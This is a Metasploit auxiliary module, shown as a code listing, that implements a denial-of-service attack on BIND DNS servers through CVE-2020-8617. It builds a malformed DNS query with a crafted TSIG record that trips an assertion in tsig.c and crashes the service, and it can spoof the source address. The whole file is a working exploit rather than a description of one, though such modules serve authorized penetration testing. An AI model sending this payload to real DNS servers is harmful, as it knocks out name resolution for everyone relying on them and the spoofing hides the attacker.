Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Capture
8
  include Msf::Auxiliary::UDPScanner
9
  include Msf::Auxiliary::Dos
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'BIND TSIG Badtime Query Denial of Service',
16
        'Description' => %q{
17
          A logic error in code which checks TSIG validity can be used to
18
          trigger an assertion failure in tsig.c.
19
        },
20
        'Author' => [
21
          'Tobias Klein',  # Research and Original PoC
22
          'Shuto Imai',    # msf module author
23
        ],
24
        'References' => [
25
          ['CVE', '2020-8617'],
26
          ['URL', 'https://gitlab.isc.org/isc-projects/bind9/-/issues/1703'],
27
          ['URL', 'https://www.trapkit.de/advisories/TKADV2020-002.txt']
28
        ],
29
        'DisclosureDate' => '2020-05-19',
30
        'License' => MSF_LICENSE,
31
        'DefaultOptions' => { 'ScannerRecvWindow' => 0 },
32
        'Notes' => {
33
          'Stability' => [CRASH_SERVICE_DOWN],
34
          'SideEffects' => [],
35
          'Reliability' => []
36
        }
37
      )
38
    )
39

40
    register_options([
41
      Opt::RPORT(53),
42
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']),
43
    ])
44

45
    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
46
  end
47

48
  def scan_host(ip)
49
    print_status("Sending packet to #{ip}")
50
    if datastore['SRC_ADDR']
51
      scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])
52
    else
53
      scanner_send(payload, ip, rport)
54
    end
55
  end
56

57
  def payload
58
    query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65
59
    query << "\x00\x00"  # Flags: 0x0000 Standard query
60
    query << "\x00\x01"  # Questions: 1
61
    query << "\x00\x00"  # Answer RRs: 0
62
    query << "\x00\x00"  # Authority RRs: 0
63
    query << "\x00\x01"  # Additional RRs: 1
64

65
    # Domain Name
66
    query << get_domain # Random DNS Name
67
    query << "\x00"      # [End of name]
68
    query << "\x00\x01"  # Type: A (Host Address) (1)
69
    query << "\x00\x01"  # Class: IN (0x0001)
70

71
    # Additional records. Name
72
    query << "\x0alocal-ddns"
73
    query << "\x00"
74

75
    query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
76
    query << "\x00\xff" # Class: ANY (0x00ff)
77
    query << "\x00\x00\x00\x00" # Time to live: 0
78
    query << "\x00\x1d" # Data length: 29
79

80
    # Algorithm Name
81
    query << "\x0bhmac-sha256" # The algorithm for local-ddns is hmac-sha256
82
    query << "\x00"
83

84
    # Rest of TSIG
85
    query << "\x00\x00\x00\x00\x00\x00" # Time Signed: Jan  1, 1970 00:00:00.000000000 UTC
86
    query << "\x00\x00" # Fudge: 0
87
    query << "\x00\x00" # MAC Size: 0
88
    query << "\x00\x00" # Original Id: 0
89
    query << "\x00\x10" # Error: BadSig (16)
90
    query << "\x00\x00" # Other len: 0
91
  end
92

93
  def get_domain
94
    domain = "\x06#{Rex::Text.rand_text_alphanumeric(6)}"
95
    org = "\x03#{Rex::Text.rand_text_alphanumeric(3)}"
96
    domain + org
97
  end
98

99
end
100

101